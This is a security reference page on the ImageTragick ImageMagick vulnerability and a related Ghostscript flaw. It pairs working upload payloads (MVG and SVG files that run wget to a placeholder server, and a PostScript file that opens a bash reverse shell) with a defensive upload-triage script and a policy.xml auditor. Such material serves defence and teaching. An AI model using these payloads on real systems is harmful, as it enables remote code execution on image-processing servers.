ImageMagick (CVE-2016-3714)
ImageMagick before 6.9.3-10 / 7.0.1-1 is vulnerable to remote code execution through crafted image files (CVE-2016-3714, known as ImageTragick): filenames embedded in an image are passed to external delegate commands (for example curl or wget for https: URLs) without adequate filtering, so shell metacharacters inside them are executed. The vulnerability and its exploitation are described on the official ImageTragick website (https://imagetragick.com).
Common exploits
ImageMagick selects the coder from the file's leading bytes rather than from its extension, so each payload below can be uploaded under an innocuous name such as image.jpg. Replace <server_ip> with a host you control; the wget callback carrying the output of whoami confirms that the command ran.
exploit.mvg (the double quote closes the URL argument of the https delegate command, the pipe appends our command, and the delegate template's own closing quote terminates it; the MVG parser strips the final ')' of the url(...) token, so it must sit inside the injected quotes)
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/x.jpg"|wget "http://<server_ip>/$(whoami))'
pop graphic-context
exploit.svg (ImageMagick's built-in SVG coder rewrites the image element as an MVG image primitive, so the same delegate injection applies; the quotes must be written as &quot; to keep the XML well-formed, and the literal '<' of the <server_ip> placeholder must be replaced before use)
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="https://127.0.0.1/x.jpg&quot;|wget &quot;http://<server_ip>/$(whoami)" x="0" y="0" height="640px" width="480px"/>
</svg>
exploit.jpg (this one is a Ghostscript payload, CVE-2018-16509, fixed in Ghostscript 9.24, not ImageTragick itself: the %!PS header makes ImageMagick hand the file to Ghostscript regardless of the .jpg extension, and the restore trick escapes -dSAFER to reach the %pipe% output device; start a listener on <server_ip>:8080 first, e.g. nc -lvnp 8080)
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/<server_ip>/8080 0>&1') currentdevice putdeviceprops
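The script below is an added example (not from the original page or the ImageMagick project) of the check these payloads defeat: it sniffs the real format from the leading bytes the way ImageMagick does, compares it with what the extension claims, and scans for the delegate-injection, %pipe% and dangerous-coder patterns used above. The exploit samples are constructed from the payloads above with a harmless touch in place of the real command; the signature table and pattern list are deliberately small and illustrative.

```python
"""Content-based triage for ImageTragick-style uploads (added example).

ImageMagick picks a coder from the file's leading bytes, not from its
extension, so a ".jpg" that starts with "%!PS" or "push graphic-context"
reaches the PostScript or MVG coder.  This sniffs the real format,
compares it with the extension, and flags the injection patterns the
payloads rely on.  The samples at the bottom are constructed.
"""
import html
import re

# Leading-byte signatures (a small subset of ImageMagick's magic table).
SIGNATURES = [
    (b"\xff\xd8\xff", "JPEG"),
    (b"\x89PNG\r\n\x1a\n", "PNG"),
    (b"GIF87a", "GIF"),
    (b"GIF89a", "GIF"),
    (b"%!PS", "PS"),
    (b"%PDF", "PDF"),
    (b"push graphic-context", "MVG"),
]

EXT_TO_FORMAT = {"jpg": "JPEG", "jpeg": "JPEG", "png": "PNG", "gif": "GIF",
                 "svg": "SVG", "mvg": "MVG", "ps": "PS", "pdf": "PDF"}

# Matched on entity-decoded text so that &quot;| inside an SVG attribute
# is seen as the "| it becomes after XML parsing.
INJECTION_PATTERNS = [
    (re.compile(r'"\s*[|;&`]'), "delegate command injection (CVE-2016-3714)"),
    (re.compile(r"\$\("), "shell command substitution"),
    (re.compile(r"%pipe%"), "Ghostscript %pipe% output device"),
    (re.compile(r"(?:xlink:href|url\()\s*=?\s*[\"']?https?://", re.I),
     "remote fetch (CVE-2016-3718 SSRF)"),
    (re.compile(r"\b(?:ephemeral|msl):|\b(?:label|text|caption):@", re.I),
     "file-handling coder prefix (CVE-2016-3715/3716/3717)"),
]


def sniff_format(data: bytes) -> str:
    """Identify the format from content, the way ImageMagick does."""
    for magic, fmt in SIGNATURES:
        if data.startswith(magic):
            return fmt
    head = data[:4096]
    if head.startswith(b"<?xml") or b"<svg" in head:
        return "SVG"  # simplification: any XML is treated as SVG here
    return "UNKNOWN"


def find_injection(data: bytes) -> list:
    """Return the labels of every suspicious pattern present in the file."""
    text = html.unescape(data.decode("latin-1"))  # latin-1 never fails
    return [label for rx, label in INJECTION_PATTERNS if rx.search(text)]


def triage(filename: str, data: bytes) -> dict:
    """Decide whether an upload may be handed to ImageMagick at all."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    claimed = EXT_TO_FORMAT.get(ext, "UNKNOWN")
    actual = sniff_format(data)
    findings = find_injection(data)
    mismatch = actual != claimed
    return {"claimed": claimed, "actual": actual, "mismatch": mismatch,
            "findings": findings,
            "verdict": "reject" if mismatch or findings else "accept"}


# --- constructed samples: the page's payloads with a harmless command -------
MVG_SAMPLE = b"""push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/x.jpg"|touch "/tmp/imagetragick)'
pop graphic-context
"""

SVG_SAMPLE = b"""<?xml version="1.0" standalone="no"?>
<svg width="640px" height="480px" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="https://127.0.0.1/x.jpg&quot;|touch &quot;/tmp/imagetragick" x="0" y="0" height="480px" width="640px"/>
</svg>
"""

PS_SAMPLE = b"""%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%touch /tmp/imagetragick) currentdevice putdeviceprops
"""

# Minimal JFIF header: enough for the magic check, not a decodable image.
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00" + b"\x00" * 20

if __name__ == "__main__":
    for name, blob in [("exploit.mvg", MVG_SAMPLE), ("exploit.svg", SVG_SAMPLE),
                       ("exploit.jpg", PS_SAMPLE), ("photo.jpg", JPEG_SAMPLE)]:
        print(name, triage(name, blob))
```

Run as-is and the three exploit samples are rejected (the PostScript one both for the format mismatch and for %pipe%), while the JPEG header passes. The point of the mismatch check is that it does not depend on knowing any payload: a file whose content is not the format its name claims is never worth passing to an image library.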
Other vulnerabilities
The ImageTragick disclosure covered four further issues, all reachable through the same crafted-image path:
- CVE-2016-3718 - SSRF (the url:/https: coders fetch attacker-chosen URLs)
- CVE-2016-3715 - file deletion (the ephemeral: coder deletes the referenced file after reading it)
- CVE-2016-3716 - file moving (the msl: coder can write the image to an arbitrary path)
- CVE-2016-3717 - local file read (the label:@ syntax renders a local file as text)
Mitigation, as recommended on the ImageTragick site: verify the magic bytes of uploaded files before passing them to ImageMagick, and install a policy.xml that disables the EPHEMERAL, URL, HTTPS, MVG, MSL, TEXT, SHOW, WIN and PLT coders.
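An added example, not from the page or the ImageMagick project: a small auditor for policy.xml that reports which of the coders behind these issues a policy still lets ImageMagick decode. It puts a default-style policy (resource limits only, constructed here) next to the hardened policy from the ImageTragick mitigation, with the Ghostscript-backed formats added for the PostScript payload above. Matching follows ImageMagick's deny-wins rule (any matching coder policy that lacks the read right blocks decoding); treating a missing rights attribute as granting nothing is an assumption, and brace patterns such as {PS,EPS} are not expanded.

```python
"""Audit an ImageMagick policy.xml for the ImageTragick coder denials (added example)."""
import xml.etree.ElementTree as ET
from fnmatch import fnmatchcase

# Coders that must not be readable.  The first nine are the policy.xml
# published as the ImageTragick mitigation; the rest route through
# Ghostscript, which the "%!PS" payload abuses.
REQUIRED_DENIALS = [
    "EPHEMERAL", "URL", "HTTPS", "MVG", "MSL", "TEXT", "SHOW", "WIN", "PLT",
    "PS", "PS2", "PS3", "EPS", "PDF", "XPS",
]

# Constructed: a policy that only sets resource limits, as many stock
# installs shipped at the time.
DEFAULT_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="disk" value="1GiB"/>
</policymap>
"""

# Constructed: the same file with every dangerous coder denied.
HARDENED_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="disk" value="1GiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="URL"/>
  <policy domain="coder" rights="none" pattern="HTTPS"/>
  <policy domain="coder" rights="none" pattern="MVG"/>
  <policy domain="coder" rights="none" pattern="MSL"/>
  <policy domain="coder" rights="none" pattern="TEXT"/>
  <policy domain="coder" rights="none" pattern="SHOW"/>
  <policy domain="coder" rights="none" pattern="WIN"/>
  <policy domain="coder" rights="none" pattern="PLT"/>
  <policy domain="coder" rights="none" pattern="PS"/>
  <policy domain="coder" rights="none" pattern="PS2"/>
  <policy domain="coder" rights="none" pattern="PS3"/>
  <policy domain="coder" rights="none" pattern="EPS"/>
  <policy domain="coder" rights="none" pattern="PDF"/>
  <policy domain="coder" rights="none" pattern="XPS"/>
</policymap>
"""


def coder_policies(policy_xml: str):
    """Yield (pattern, rights) for every coder-domain policy entry."""
    root = ET.fromstring(policy_xml)
    for p in root.iter("policy"):
        if p.get("domain", "").lower() != "coder":
            continue
        # Assumption: a missing rights attribute grants nothing.
        yield p.get("pattern", ""), p.get("rights", "none").lower()


def can_read(coder: str, policy_xml: str) -> bool:
    """True unless a matching coder policy withholds the read right (deny wins)."""
    for pattern, rights in coder_policies(policy_xml):
        if fnmatchcase(coder.upper(), pattern.upper()) and "read" not in rights:
            return False
    return True


def audit(policy_xml: str) -> list:
    """Return the dangerous coders the policy still lets ImageMagick decode."""
    return [c for c in REQUIRED_DENIALS if can_read(c, policy_xml)]


if __name__ == "__main__":
    for name, policy in [("default", DEFAULT_POLICY), ("hardened", HARDENED_POLICY)]:
        gaps = audit(policy)
        print(f"{name}: {'OK' if not gaps else 'still readable: ' + ', '.join(gaps)}")
```

Point it at the real file (typically /etc/ImageMagick-6/policy.xml or /etc/ImageMagick-7/policy.xml) by reading it into a string; a denied coder makes the delegate never run, which is why the policy is the mitigation rather than just patching the quoting.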